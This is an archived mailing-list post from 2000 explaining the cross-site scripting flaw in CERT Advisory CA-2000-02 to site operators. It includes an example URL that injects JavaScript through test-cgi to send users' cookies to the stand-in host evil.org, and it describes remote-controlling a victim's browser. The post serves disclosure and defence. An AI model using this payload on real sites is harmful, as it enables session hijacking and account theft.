Re: Fwd: CERT Advisory CA-2000-02

From: Henri Torgemane (metal_hurlantat_private)
Date: Thu Feb 03 2000 - 14:22:38 PST

    First, what the CERT describes isn't one of the many implementation bugs we've
    seen before, like bugs crashing the browser or giving access to local resources:
    This is a design problem.

    One obvious abuse could be to compromise online accounts:
    Many sites use cookies to avoid asking for a username/password on every page of
    their site. As a result, cookies are often equivalent to passwords.
    Interestingly, javascript can access cookies on the domain from which the script
    has been loaded.
    Say, if your site uses cookies as a mean of authentication and has test-cgi
    installed, you can get your user's cookies grabbed with a URL like:
    http://yoursite.com/cgi-bin/test-cgi?a=>(new
    Image).src="http://evil.org/?"+escape(document.cookie)</script>
    Each time a user of your site happens to follow that URL, the log of the
    evil.org web server will contain the cookies for his account.

    In other cases, rather than actually taking the cookie, one can instead choose
    to "remote-control" the browser, making it take actions to modify the user
    account or grab some personal information (e-mail messages on a webmail system,
    for example) without the user having a chance to see what's going on.

    Hope it helps,
    Henri Torgemane